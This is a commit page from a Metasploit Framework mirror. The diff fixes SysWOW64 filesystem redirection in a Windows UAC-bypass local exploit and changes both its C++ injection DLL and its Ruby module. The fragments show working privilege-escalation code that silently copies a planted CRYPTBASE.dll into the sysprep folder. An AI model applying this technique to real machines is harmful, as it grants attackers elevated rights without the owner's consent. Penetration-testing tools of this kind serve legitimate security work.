infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixup SysWOW64

bug/bundler_fix
Meatballs 2013-09-27 09:10:49 +01:00
parent b8df7cc496
commit dfac7b57d2
2 changed files with 10 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp vendored
View File

@ -25,6 +25,8 @@ void exploit()
const IID *pIID_EIFOClass = &__uuidof(FileOperation);
const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
Wow64DisableWow64FsRedirection(&OldValue);
GetWindowsDirectoryW(windir, MAX_PATH);
GetTempPathW(MAX_PATH, path);
@ -44,8 +46,7 @@ void exploit()
wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe);
if (CoInitialize(NULL) == S_OK)
{
//Wow64DisableWow64FsRedirection(&OldValue);
{
if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**) &pFileOp) == S_OK)
{
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) == S_OK)

14
modules/exploits/windows/local/bypassuac_injection.rb
View File

@ -120,6 +120,13 @@ class Metasploit3 < Msf::Exploit::Local
# decide, x86 or x64
sysarch = sysinfo["Architecture"]
if sysarch =~ /x64/i
unless target_arch.first == 'x86_64'
fail_with(
Exploit::Failure::BadConfig,
"x86 Target Selected for x64 System"
)
end
bpdll_path = ::File.join(path, "bypassuac-x64.dll")
if sysarch =~ /WOW64/i
@ -129,13 +136,6 @@ class Metasploit3 < Msf::Exploit::Local
# SysWOW64 Redirection...
register_files_for_cleanup("#{windir}\\System32\\sysprep\\CRYPTBASE.dll")
end
unless target_arch.first == 'x86_64'
fail_with(
Exploit::Failure::BadConfig,
"x86 Target Selected for x64 System"
)
end
else
if target_arch.first =~ /x64/i
fail_with(